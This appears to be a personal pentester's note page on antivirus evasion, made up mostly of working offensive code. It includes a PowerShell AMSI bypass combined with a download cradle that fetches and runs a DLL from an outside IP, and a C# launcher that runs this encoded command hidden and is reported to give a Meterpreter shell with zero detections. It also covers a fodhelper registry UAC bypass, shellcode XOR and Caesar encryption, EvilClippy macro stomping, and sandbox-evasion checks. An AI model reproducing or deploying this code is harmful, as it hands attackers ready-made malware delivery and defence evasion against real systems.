Backlink: reference-notes-readme

AV Evasion Techniques

Stage Runners

I haven't tested this, but a simple FetchDllRunner only popped on 5/26 AV products on AntiScan.Me. All of them were heuristics detections. I think the best way to beat AV right now would be to include some heuristics evasion within bin-FetchDllRunner, then stage that compiled binary on the target. When executed, it would then reach out to my server to source the malicious DLL. This malicious DLL would be something like dll-Hollow or dll-Hollow-Encrypted. This way, nothing is staged in memory, and nothing is running through PS so AMSI shouldn't be a thing at all here.

To do this, I need to run powershell to source the dll, since I'd have to write to disc to do it in c# directly.

First I encode the ps command in PS b64.

$c1 = '$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields("NonPublic,Static");Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}};$g=$f.SetValue($null,$true)'
$c2 = '; [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://192.168.49.205/ClassLibrary.dll")).GetType("ClassLibrary.Class1").GetMethod("runner").Invoke(0, $null)'
$command = $c1 + $c2
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

Then I place the encoded command in the bin-fetchDllRunner-noInjection code.

// sources ps script that will then source and exec dll like dll-hollow etc. As of 7 JUL 2022 it has a detection of 0/26.
using System.Diagnostics;

namespace Application
{
    class Program
    {
        static void Main(string[] args)
        {
            Process process = new Process();
            ProcessStartInfo startInfo = new ProcessStartInfo();
            startInfo.WindowStyle = ProcessWindowStyle.Hidden;
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/C powershell.exe -enc JABhAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQBzACgAKQA7AEYAbwByAGUAYQBjAGgAKAAkAGIAIABpAG4AIAAkAGEAKQAgAHsAaQBmACAAKAAkAGIALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAVQB0AGkAbABzACIAKQAgAHsAJABjAD0AJABiAH0AfQA7ACQAZAA9ACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAIgBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACIAKQA7AEYAbwByAGUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgA9ACQAZQB9AH0AOwAkAGcAPQAkAGYALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADIAMAA1AC8AQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkALgBkAGwAbAAiACkAKQAuAEcAZQB0AFQAeQBwAGUAKAAiAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5AC4AQwBsAGEAcwBzADEAIgApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAiAHIAdQBuAG4AZQByACIAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJABuAHUAbABsACkA";
            process.StartInfo = startInfo;
            process.Start();
        }
    }
}

Building the code above, transferring it to the target, and executing results in a Meterpreter shell running under the svchost.exe process, and the file written to disk has no AV flags, it's completely clean.

Can I do the same thing with the fodbypass method?

$c1='New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe -enc JABhAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQBzACgAKQA7AEYAbwByAGUAYQBjAGgAKAAkAGIAIABpAG4AIAAkAGEAKQAgAHsAaQBmACAAKAAkAGIALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAVQB0AGkAbABzACIAKQAgAHsAJABjAD0AJABiAH0AfQA7ACQAZAA9ACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAIgBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACIAKQA7AEYAbwByAGUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgA9ACQAZQB9AH0AOwAkAGcAPQAkAGYALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADIAMAA1AC8AQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkALgBkAGwAbAAiACkAKQAuAEcAZQB0AFQAeQBwAGUAKAAiAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5AC4AQwBsAGEAcwBzADEAIgApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAiAHIAdQBuAG4AZQByACIAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJABuAHUAbABsACkA" -Force; New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force; C:\Windows\System32\fodhelper.exe'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($c1)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $c1
echo $encodedCommand

That worked! Now to put the full command in the binary.

Encrypt Shellcode

Don't use msfvenom's built in encryption, the decryption methods are static and will flag. Instead, copy generated shellcode and insert into bin-Helper in order to manually encrypt with XOR cipher. Build the bin-Helper project, then execute it. This will output the encrypted shellcode. Copy and paste it in to bin-embedded-Shellcode and build that project to get the final malicious binary.

VBA Macro Evasion

EvilClippy

Replaces VBA source code in malicious doc with fake code, and sets malicious p-code to run on 32-bit installs of Office 2016. The -g flag hides all modules. The -u flag marks project as locked and unviewable. The -r flag confuses stuff like pcodedmp and many other analysis tools.

EvilClippy.exe -s fakecode.vba -t 2016x86 -g -u -r macrofile.doc

Don't erase my code.

Sleep Evasion

...
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);

static void Main(string[] args)
{
    DateTime t1 = DateTime.Now;
    Sleep(2000);
    double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
    if(t2 < 1.5)
    {
        return;
    }
...

Non-emulated APIs

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, 
    uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();

IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if(mem == null)
{
    return;
}

FlsAlloc Heuristics Bypass

IntPtr ptrCheck = FlsAlloc(IntPtr.Zero);
            if (ptrCheck == null)
            {
                return;
            }

VBA Encryption Bypass

Encrypt shellcode:

1   byte[] encoded = new byte[buf.Length];
2   for(int i = 0; i < buf.Length; i++)
3   {
4     encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
5   }
6 
7   uint counter = 0;
8 
9   StringBuilder hex = new StringBuilder(encoded.Length * 2);
10  foreach(byte b in encoded)
11  {
12    hex.AppendFormat("{0:D}, ", b);
13    counter++;
14    if(counter % 50 == 0)
15    {
16        hex.AppendFormat("_{0}", Environment.NewLine);
17    }
18  }
19  Console.WriteLine("The payload is: " + hex.ToString());

Decrypt in binary code:

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
...
Dim t1 As Date
Dim t2 As Date
Dim time As Long

t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)

If time < 2 Then
    Exit Function
End If
...

Caesar Cipher w/ Time-lapse detection

Dont erase